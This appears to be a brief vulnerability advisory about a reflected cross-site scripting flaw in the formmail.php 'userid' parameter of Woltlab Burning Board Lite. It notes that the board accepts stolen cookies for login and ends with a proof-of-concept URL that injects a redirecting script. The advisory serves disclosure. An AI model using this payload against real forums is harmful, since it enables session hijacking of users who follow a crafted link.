Advisory Information

--------------------

Advisory name : Woltlab Burning Board Lite formmail.php XSS

Discovered by : drhankey / it-security23.net

Vendor Name : Woltlab

Vendor Homepage : http://www.woltlab.de

Software : Woltlab Burning Board Lite

Vulnerability Type : Cross-Site-Scripting

Vulnerable Versions : 1.0.0, 1.0.1e, maybe more

Platforms : OS Independent, PHP

What is Woltlab Burning Board Lite?

----------------------------------

Woltlab Burning Board Lite is the free version of the Woltlab Burning Board,

a PHP based bulletin board

Vulnerability Description:

-------------------------

formmail.php outputs the "userid"-parameter unfiltered, so its possible to add arbitary Code to the output by using a malformed link.

The Board also allows logging in with stolen cookies.

Proof of Concept:

-----------------

http://website/board/formmail.php?userid=1"><script>document.locat
ion.href="http://www.it-security23.net";</script x="y

[ reply ]